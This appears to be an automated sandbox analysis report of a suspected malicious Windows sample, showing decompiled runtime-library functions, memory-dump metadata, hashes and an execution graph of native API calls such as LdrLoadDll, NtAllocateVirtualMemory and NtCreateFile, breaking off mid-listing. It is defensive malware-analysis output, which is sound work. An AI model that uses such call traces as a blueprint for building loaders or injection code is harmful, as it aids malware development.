                                                        0x008853be
                                                        0x008853be
                                                        0x008853c0
                                                        0x00000000
                                                        0x00000000
                                                        0x008c2269
                                                        0x008c226d
                                                        0x008c2349
                                                        0x008c234d
                                                        0x008c2273
                                                        0x008c2276
                                                        0x008c2279
                                                        0x008c227e
                                                        0x008c2283
                                                        0x008c2287
                                                        0x008c228a
                                                        0x008c228d
                                                        0x008c228f
                                                        0x008c22bc
                                                        0x008c22bc
                                                        0x008c22bc
                                                        0x008c22be
                                                        0x008c22c4
                                                        0x008c22cc
                                                        0x008c22d0
                                                        0x008c22d6
                                                        0x008c22d7
                                                        0x008c22da
                                                        0x008c22df
                                                        0x008c22e4
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22e6
                                                        0x008c22e9
                                                        0x008c22f4
                                                        0x008c22f9
                                                        0x008c22fa
                                                        0x008c2305
                                                        0x008c2314
                                                        0x008c2319
                                                        0x008c231a
                                                        0x008c231d
                                                        0x008c2320
                                                        0x008c2323
                                                        0x008c2323
                                                        0x008c2328
                                                        0x008c232d
                                                        0x008c232f
                                                        0x008c2331
                                                        0x008c2336
                                                        0x008c2336
                                                        0x008c233b
                                                        0x008c233d
                                                        0x008c2350
                                                        0x008c2351
                                                        0x008c2356
                                                        0x008c2359
                                                        0x008c2359
                                                        0x008c235b
                                                        0x008c235d
                                                        0x00885367
                                                        0x0088536b
                                                        0x00885372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c2363
                                                        0x008c2363
                                                        0x008c2369
                                                        0x008c236a
                                                        0x008c236c
                                                        0x008c2371
                                                        0x008c2373
                                                        0x00000000
                                                        0x008c2379
                                                        0x008c2379
                                                        0x008c237a
                                                        0x008c237f
                                                        0x008c237f
                                                        0x008c2385
                                                        0x008c2386
                                                        0x008c2389
                                                        0x008c238e
                                                        0x008c2390
                                                        0x00885378
                                                        0x0088537c
                                                        0x008c2396
                                                        0x008c2396
                                                        0x008c2397
                                                        0x008c239c
                                                        0x008c23a2
                                                        0x008c23a3
                                                        0x008c23a6
                                                        0x008c23ab
                                                        0x008c23ad
                                                        0x00000000
                                                        0x008c23b3
                                                        0x008c23b3
                                                        0x008c23b4
                                                        0x008c23b9
                                                        0x008c23ba
                                                        0x008c23ba
                                                        0x008c23bc
                                                        0x008c23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x008b9153
                                                        0x008b9158
                                                        0x008b915a
                                                        0x008b915e
                                                        0x008b9160
                                                        0x00000000
                                                        0x008b9166
                                                        0x008b9166
                                                        0x008b9171
                                                        0x008b9176
                                                        0x008b9176
                                                        0x00000000
                                                        0x008b9160
                                                        0x008c23c6
                                                        0x008c23cb
                                                        0x008c23ce
                                                        0x008c23d7
                                                        0x008c23d7
                                                        0x008c23ad
                                                        0x008c2390
                                                        0x008c2373
                                                        0x008c233f
                                                        0x008c233f
                                                        0x00000000
                                                        0x008c233f
                                                        0x008c2291
                                                        0x008c2291
                                                        0x008c2293
                                                        0x008c2295
                                                        0x008c229a
                                                        0x008c22a1
                                                        0x008c22a3
                                                        0x008c22a7
                                                        0x008c22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22ab
                                                        0x008c22ad
                                                        0x008c22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22af
                                                        0x008c22b1
                                                        0x008c22b4
                                                        0x008c22b4
                                                        0x008c22b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22b6
                                                        0x008c228f
                                                        0x00000000
                                                        0x008c226d
                                                        0x008853cb
                                                        0x008853ce
                                                        0x008853d0
                                                        0x008853d4
                                                        0x008853d6
                                                        0x00000000
                                                        0x008853d8
                                                        0x008853e3
                                                        0x008853ea
                                                        0x008853ea
                                                        0x008853d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C22F4
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008C22FC
                                                        • RTL: Re-Waiting, xrefs: 008C2328
                                                        • RTL: Resource at %p, xrefs: 008C230B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                        • Instruction ID: 728101a97bab29702f6e86f7d53fdb4a5a0b55dd0cdf341c2381c0d06fc7e549
                                                        • Opcode Fuzzy Hash: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                        • Instruction Fuzzy Hash: 085114716007016BEB11AB2CCC81FAA73A8FF56364F104229FD09DB381EA75ED4187A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B91C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E013B4BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E013B917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E013B1CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                                        0x013b91ce
                                                        0x013b91d3
                                                        0x013b91ed
                                                        0x00000000
                                                        0x013b91ed
                                                        0x013b91d5
                                                        0x013b91da
                                                        0x00000000
                                                        0x00000000
                                                        0x013b91df
                                                        0x013b91fc
                                                        0x013b9201
                                                        0x013b9204
                                                        0x013b920b
                                                        0x013b922a
                                                        0x013b9231
                                                        0x013b9233
                                                        0x013b9277
                                                        0x013b9283
                                                        0x013b9286
                                                        0x013b928b
                                                        0x013b928e
                                                        0x013b9294
                                                        0x013b9296
                                                        0x013b92a6
                                                        0x013b92a6
                                                        0x013b92aa
                                                        0x013b92ac
                                                        0x013b92af
                                                        0x013b92af
                                                        0x013b92af
                                                        0x013b92af
                                                        0x00000000
                                                        0x013b92b5
                                                        0x013b9298
                                                        0x013b9298
                                                        0x013b929d
                                                        0x013b929d
                                                        0x013b92a0
                                                        0x00000000
                                                        0x013b92a0
                                                        0x013b9235
                                                        0x013b9238
                                                        0x013b923c
                                                        0x013b9265
                                                        0x013b9265
                                                        0x013b9265
                                                        0x013b9268
                                                        0x013b9268
                                                        0x00000000
                                                        0x00000000
                                                        0x013b926a
                                                        0x013b926e
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9270
                                                        0x013b9270
                                                        0x013b9270
                                                        0x00000000
                                                        0x013b9270
                                                        0x013b923e
                                                        0x013b923e
                                                        0x013b9241
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9245
                                                        0x013b924f
                                                        0x013b9255
                                                        0x013b9258
                                                        0x013b925e
                                                        0x013b9261
                                                        0x013b9263
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b9263
                                                        0x013b920d
                                                        0x013b9210
                                                        0x013b9212
                                                        0x013b9217
                                                        0x013b9217
                                                        0x013b921c
                                                        0x00000000
                                                        0x013b921c
                                                        0x013b91e1
                                                        0x013b91e6
                                                        0x013b91ea
                                                        0x013b91ea
                                                        0x00000000

                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013B91FC
                                                        • __isleadbyte_l.LIBCMT ref: 013B922A
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 013B9258
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 013B928E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction ID: d86a7a1f11582a673608fc84ac8bb432bb18804f92e15a5ae5a2cb95dde52d73
                                                        • Opcode Fuzzy Hash: 179524b547c1659d597cb0f7ecacbe480c9fc492c6471cc5f858324418a6fecd
                                                        • Instruction Fuzzy Hash: 9C31C271A0024EAFEB218E69CC84BEA7FA9BF4131CF154128E7158B990F731D850DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013BA94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E013BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E013BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E013BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E013BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                        0x013ba950
                                                        0x013ba956
                                                        0x013ba9c9
                                                        0x00000000
                                                        0x013ba95d
                                                        0x013ba95d
                                                        0x013ba960
                                                        0x013ba97b
                                                        0x013ba97e
                                                        0x013ba99e
                                                        0x013ba9b0
                                                        0x013ba980
                                                        0x013ba980
                                                        0x013ba983
                                                        0x00000000
                                                        0x013ba985
                                                        0x013ba997
                                                        0x013ba997
                                                        0x013ba983
                                                        0x013ba9ce
                                                        0x013ba9d2
                                                        0x013ba962
                                                        0x013ba97a
                                                        0x013ba97a
                                                        0x013ba960

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: d722a6699da6baaa2af529011bcd170f5a409b5f950ebcbb33fffb9adf9c83e0
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 72014C7604464EFBCF125F88CC818EE3F66BB19258B4A8515FF195A830E736C5B1BB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:706
                                                        Total number of Limit Nodes:80
                                                        execution_graph 68371 128ff0 68382 12be20 68371->68382 68373 12910c 68374 12902b 68374->68373 68385 11a0e0 68374->68385 68376 129061 68390 125a40 68376->68390 68378 129090 Sleep 68381 12907d 68378->68381 68381->68373 68381->68378 68395 128c20 LdrLoadDll 68381->68395 68396 128e20 LdrLoadDll 68381->68396 68383 12be4d 68382->68383 68397 12a4b0 68382->68397 68383->68374 68387 11a104 68385->68387 68386 11a10b 68386->68376 68387->68386 68388 11a157 68387->68388 68389 11a14d LdrLoadDll 68387->68389 68388->68376 68389->68388 68391 125a4e 68390->68391 68392 125a5a 68390->68392 68391->68392 68404 125ec0 LdrLoadDll 68391->68404 68392->68381 68394 125bac 68394->68381 68395->68381 68396->68381 68400 12af20 68397->68400 68399 12a4cc NtAllocateVirtualMemory 68399->68383 68402 12afa5 68400->68402 68403 12af2f 68400->68403 68401 125a40 LdrLoadDll 68401->68402 68402->68399 68403->68401 68403->68402 68404->68394 68407 1e9f900 LdrInitializeThunk 68409 12f27d 68412 12ba20 68409->68412 68413 12ba46 68412->68413 68420 119100 68413->68420 68415 12ba52 68419 12ba76 68415->68419 68428 1183f0 68415->68428 68460 12a620 68419->68460 68421 11910d 68420->68421 68463 119050 68420->68463 68423 119114 68421->68423 68475 118ff0 68421->68475 68423->68415 68429 118417 68428->68429 68872 11a5b0 68429->68872 68431 118429 68876 11a300 68431->68876 68433 118446 68441 11844d 68433->68441 68929 11a230 LdrLoadDll 68433->68929 68435 118594 68435->68419 68437 1184b6 68437->68435 68438 12c070 2 API calls 68437->68438 68439 1184cc 68438->68439 68440 12c070 2 API calls 68439->68440 68442 1184dd 68440->68442 68441->68435 68880 11d710 68441->68880 68443 12c070 2 API calls 68442->68443 68444 1184ee 68443->68444 68892 11b470 68444->68892 68446 118501 68447 125640 8 API calls 68446->68447 68448 118512 68447->68448 68449 125640 8 API calls 68448->68449 68450 118523 68449->68450 68451 118543 68450->68451 68904 11bfe0 68450->68904 68453 125640 8 API calls 68451->68453 68456 11858b 68451->68456 68458 11855a 68453->68458 68910 1181d0 68456->68910 68458->68456 68931 11c080 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 68458->68931 68461 12af20 LdrLoadDll 68460->68461 68462 12a63f 68461->68462 68495 128b40 68463->68495 68467 119076 68467->68421 68468 11906c 68468->68467 68502 12b2d0 68468->68502 68470 1190b3 68470->68467 68513 118e70 68470->68513 68472 1190d3 68519 1188d0 LdrLoadDll 68472->68519 68474 1190e5 68474->68421 68476 119000 68475->68476 68851 12b5c0 68476->68851 68479 12b5c0 LdrLoadDll 68480 11901b 68479->68480 68481 12b5c0 LdrLoadDll 68480->68481 68482 119031 68481->68482 68483 11d510 68482->68483 68484 11d529 68483->68484 68855 11a430 68484->68855 68486 11d53c 68859 12a150 68486->68859 68489 119125 68489->68415 68491 11d562 68492 11d58d 68491->68492 68865 12a1d0 68491->68865 68494 12a400 2 API calls 68492->68494 68494->68489 68496 128b4f 68495->68496 68497 125a40 LdrLoadDll 68496->68497 68498 119063 68497->68498 68499 1289f0 68498->68499 68520 12a570 68499->68520 68503 12b2e9 68502->68503 68523 125640 68503->68523 68505 12b301 68506 12b30a 68505->68506 68562 12b110 68505->68562 68506->68470 68508 12b31e 68508->68506 68579 129e70 68508->68579 68829 1171c0 68513->68829 68515 118e91 68515->68472 68516 118e8a 68516->68515 68842 117480 68516->68842 68519->68474 68521 12af20 LdrLoadDll 68520->68521 68522 128a05 68521->68522 68522->68468 68524 125975 68523->68524 68534 125654 68523->68534 68524->68505 68527 125763 68648 12a3d0 LdrLoadDll 68527->68648 68528 125780 68590 12a2d0 68528->68590 68531 1257a7 68533 12bea0 2 API calls 68531->68533 68532 12576d 68532->68505 68536 1257b3 68533->68536 68534->68524 68587 129bc0 68534->68587 68535 125939 68538 12a400 2 API calls 68535->68538 68536->68532 68536->68535 68537 12594f 68536->68537 68542 125842 68536->68542 68657 125380 LdrLoadDll NtReadFile NtClose 68537->68657 68540 125940 68538->68540 68540->68505 68541 125962 68541->68505 68543 1258a9 68542->68543 68545 125851 68542->68545 68543->68535 68544 1258bc 68543->68544 68650 12a250 68544->68650 68547 125856 68545->68547 68548 12586a 68545->68548 68649 125240 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 68547->68649 68551 125887 68548->68551 68552 12586f 68548->68552 68551->68540 68606 125000 68551->68606 68594 1252e0 68552->68594 68554 125860 68554->68505 68557 12591c 68654 12a400 68557->68654 68558 12587d 68558->68505 68559 12589f 68559->68505 68561 125928 68561->68505 68563 12b12b 68562->68563 68564 12b13d 68563->68564 68565 12be20 2 API calls 68563->68565 68564->68508 68566 12b15d 68565->68566 68675 124c60 68566->68675 68568 12b180 68568->68564 68569 124c60 3 API calls 68568->68569 68571 12b1a2 68569->68571 68571->68564 68707 125f80 68571->68707 68572 12b22a 68575 12b23a 68572->68575 68802 12aea0 LdrLoadDll 68572->68802 68718 12ad10 68575->68718 68576 12b268 68797 129e30 68576->68797 68580 12af20 LdrLoadDll 68579->68580 68581 129e8c 68580->68581 68825 1e9fae8 LdrInitializeThunk 68581->68825 68582 129ea7 68584 12bea0 68582->68584 68826 12a5e0 68584->68826 68586 12b379 68586->68470 68588 12af20 LdrLoadDll 68587->68588 68589 125734 68587->68589 68588->68589 68589->68527 68589->68528 68589->68532 68591 12a2e6 68590->68591 68592 12af20 LdrLoadDll 68591->68592 68593 12a2ec NtCreateFile 68592->68593 68593->68531 68595 1252fc 68594->68595 68596 12a250 LdrLoadDll 68595->68596 68597 12531d 68596->68597 68598 125324 68597->68598 68599 125338 68597->68599 68601 12a400 2 API calls 68598->68601 68600 12a400 2 API calls 68599->68600 68602 125341 68600->68602 68603 12532d 68601->68603 68658 12c0b0 LdrLoadDll RtlAllocateHeap 68602->68658 68603->68558 68605 12534c 68605->68558 68607 12504b 68606->68607 68608 12507e 68606->68608 68609 12a250 LdrLoadDll 68607->68609 68610 1251c9 68608->68610 68614 12509a 68608->68614 68611 125066 68609->68611 68612 12a250 LdrLoadDll 68610->68612 68613 12a400 2 API calls 68611->68613 68618 1251e4 68612->68618 68616 12506f 68613->68616 68615 12a250 LdrLoadDll 68614->68615 68617 1250b5 68615->68617 68616->68559 68620 1250d1 68617->68620 68621 1250bc 68617->68621 68671 12a290 LdrLoadDll 68618->68671 68624 1250d6 68620->68624 68625 1250ec 68620->68625 68623 12a400 2 API calls 68621->68623 68622 12521e 68626 12a400 2 API calls 68622->68626 68627 1250c5 68623->68627 68628 12a400 2 API calls 68624->68628 68633 1250f1 68625->68633 68659 12c070 68625->68659 68629 125229 68626->68629 68627->68559 68630 1250df 68628->68630 68629->68559 68630->68559 68642 125103 68633->68642 68662 12a380 68633->68662 68634 125157 68635 12516e 68634->68635 68670 12a210 LdrLoadDll 68634->68670 68637 125175 68635->68637 68638 12518a 68635->68638 68639 12a400 2 API calls 68637->68639 68640 12a400 2 API calls 68638->68640 68639->68642 68641 125193 68640->68641 68643 1251bf 68641->68643 68665 12bc70 68641->68665 68642->68559 68643->68559 68645 1251aa 68646 12bea0 2 API calls 68645->68646 68647 1251b3 68646->68647 68647->68559 68648->68532 68649->68554 68651 12af20 LdrLoadDll 68650->68651 68652 125904 68651->68652 68653 12a290 LdrLoadDll 68652->68653 68653->68557 68655 12af20 LdrLoadDll 68654->68655 68656 12a41c NtClose 68655->68656 68656->68561 68657->68541 68658->68605 68672 12a5a0 68659->68672 68661 12c088 68661->68633 68663 12af20 LdrLoadDll 68662->68663 68664 12a39c NtReadFile 68663->68664 68664->68634 68666 12bc94 68665->68666 68667 12bc7d 68665->68667 68666->68645 68667->68666 68668 12c070 2 API calls 68667->68668 68669 12bcab 68668->68669 68669->68645 68670->68635 68671->68622 68673 12af20 LdrLoadDll 68672->68673 68674 12a5bc RtlAllocateHeap 68673->68674 68674->68661 68676 124c71 68675->68676 68677 124c79 68675->68677 68676->68568 68706 124f4c 68677->68706 68803 12d050 68677->68803 68679 124ccd 68680 12d050 2 API calls 68679->68680 68684 124cd8 68680->68684 68681 124d26 68683 12d050 2 API calls 68681->68683 68687 124d3a 68683->68687 68684->68681 68685 12d180 3 API calls 68684->68685 68817 12d0f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 68684->68817 68685->68684 68686 124d97 68688 12d050 2 API calls 68686->68688 68687->68686 68808 12d180 68687->68808 68689 124dad 68688->68689 68691 124dea 68689->68691 68693 12d180 3 API calls 68689->68693 68692 12d050 2 API calls 68691->68692 68696 124df5 68692->68696 68693->68689 68694 12d180 3 API calls 68694->68696 68696->68694 68702 124e2f 68696->68702 68698 12d0b0 2 API calls 68699 124f2e 68698->68699 68700 12d0b0 2 API calls 68699->68700 68701 124f38 68700->68701 68703 12d0b0 2 API calls 68701->68703 68814 12d0b0 68702->68814 68704 124f42 68703->68704 68705 12d0b0 2 API calls 68704->68705 68705->68706 68706->68568 68708 125f91 68707->68708 68709 125640 8 API calls 68708->68709 68714 125fa7 68709->68714 68710 125fb0 68710->68572 68711 125fe7 68712 12bea0 2 API calls 68711->68712 68713 125ff8 68712->68713 68713->68572 68714->68710 68714->68711 68715 126033 68714->68715 68716 12bea0 2 API calls 68715->68716 68717 126038 68716->68717 68717->68572 68818 12aba0 68718->68818 68720 12ad24 68721 12aba0 LdrLoadDll 68720->68721 68722 12ad2d 68721->68722 68723 12aba0 LdrLoadDll 68722->68723 68724 12ad36 68723->68724 68725 12aba0 LdrLoadDll 68724->68725 68726 12ad3f 68725->68726 68727 12aba0 LdrLoadDll 68726->68727 68728 12ad48 68727->68728 68729 12aba0 LdrLoadDll 68728->68729 68730 12ad51 68729->68730 68731 12aba0 LdrLoadDll 68730->68731 68732 12ad5d 68731->68732 68733 12aba0 LdrLoadDll 68732->68733 68734 12ad66 68733->68734 68735 12aba0 LdrLoadDll 68734->68735 68736 12ad6f 68735->68736 68737 12aba0 LdrLoadDll 68736->68737 68738 12ad78 68737->68738 68739 12aba0 LdrLoadDll 68738->68739 68740 12ad81 68739->68740 68741 12aba0 LdrLoadDll 68740->68741 68742 12ad8a 68741->68742 68743 12aba0 LdrLoadDll 68742->68743 68744 12ad96 68743->68744 68745 12aba0 LdrLoadDll 68744->68745 68746 12ad9f 68745->68746 68747 12aba0 LdrLoadDll 68746->68747 68748 12ada8 68747->68748 68749 12aba0 LdrLoadDll 68748->68749 68750 12adb1 68749->68750 68751 12aba0 LdrLoadDll 68750->68751 68752 12adba 68751->68752 68753 12aba0 LdrLoadDll 68752->68753 68754 12adc3 68753->68754 68755 12aba0 LdrLoadDll 68754->68755 68756 12adcf 68755->68756 68757 12aba0 LdrLoadDll 68756->68757 68758 12add8 68757->68758 68759 12aba0 LdrLoadDll 68758->68759 68760 12ade1 68759->68760 68761 12aba0 LdrLoadDll 68760->68761 68762 12adea 68761->68762 68763 12aba0 LdrLoadDll 68762->68763 68764 12adf3 68763->68764 68765 12aba0 LdrLoadDll 68764->68765 68766 12adfc 68765->68766 68767 12aba0 LdrLoadDll 68766->68767 68768 12ae08 68767->68768 68769 12aba0 LdrLoadDll 68768->68769 68770 12ae11 68769->68770 68771 12aba0 LdrLoadDll 68770->68771 68772 12ae1a 68771->68772 68773 12aba0 LdrLoadDll 68772->68773 68774 12ae23 68773->68774 68775 12aba0 LdrLoadDll 68774->68775 68776 12ae2c 68775->68776 68777 12aba0 LdrLoadDll 68776->68777 68778 12ae35 68777->68778 68779 12aba0 LdrLoadDll 68778->68779 68780 12ae41 68779->68780 68781 12aba0 LdrLoadDll 68780->68781 68782 12ae4a 68781->68782 68783 12aba0 LdrLoadDll 68782->68783 68784 12ae53 68783->68784 68785 12aba0 LdrLoadDll 68784->68785 68786 12ae5c 68785->68786 68787 12aba0 LdrLoadDll 68786->68787 68788 12ae65 68787->68788 68789 12aba0 LdrLoadDll 68788->68789 68790 12ae6e 68789->68790 68791 12aba0 LdrLoadDll 68790->68791 68792 12ae7a 68791->68792 68793 12aba0 LdrLoadDll 68792->68793 68794 12ae83 68793->68794 68795 12aba0 LdrLoadDll 68794->68795 68796 12ae8c 68795->68796 68796->68576 68798 12af20 LdrLoadDll 68797->68798 68799 129e4c 68798->68799 68824 1e9fdc0 LdrInitializeThunk 68799->68824 68800 129e63 68800->68508 68802->68575 68804 12d060 68803->68804 68805 12d066 68803->68805 68804->68679 68806 12c070 2 API calls 68805->68806 68807 12d08c 68806->68807 68807->68679 68809 12d0f0 68808->68809 68810 12c070 2 API calls 68809->68810 68811 12d14d 68809->68811 68812 12d12a 68810->68812 68811->68687 68813 12bea0 2 API calls 68812->68813 68813->68811 68815 12bea0 2 API calls 68814->68815 68816 124f24 68815->68816 68816->68698 68817->68684 68819 12abbb 68818->68819 68820 125a40 LdrLoadDll 68819->68820 68822 12abdb 68820->68822 68821 12ac8f 68821->68720 68822->68821 68823 125a40 LdrLoadDll 68822->68823 68823->68821 68824->68800 68825->68582 68827 12af20 LdrLoadDll 68826->68827 68828 12a5fc RtlFreeHeap 68827->68828 68828->68586 68830 1171d0 68829->68830 68831 1171cb 68829->68831 68832 12be20 2 API calls 68830->68832 68831->68516 68833 1171f5 68832->68833 68834 117258 68833->68834 68835 129e30 2 API calls 68833->68835 68836 11725e 68833->68836 68840 12be20 2 API calls 68833->68840 68845 12a530 68833->68845 68834->68516 68835->68833 68838 117284 68836->68838 68839 12a530 2 API calls 68836->68839 68838->68516 68841 117275 68839->68841 68840->68833 68841->68516 68843 11749e 68842->68843 68844 12a530 2 API calls 68842->68844 68843->68472 68844->68843 68846 12af20 LdrLoadDll 68845->68846 68847 12a54c 68846->68847 68850 1e9fb68 LdrInitializeThunk 68847->68850 68848 12a563 68848->68833 68850->68848 68852 12b5e3 68851->68852 68853 11a0e0 LdrLoadDll 68852->68853 68854 11900a 68853->68854 68854->68479 68856 11a453 68855->68856 68858 11a4d0 68856->68858 68870 129c00 LdrLoadDll 68856->68870 68858->68486 68860 12af20 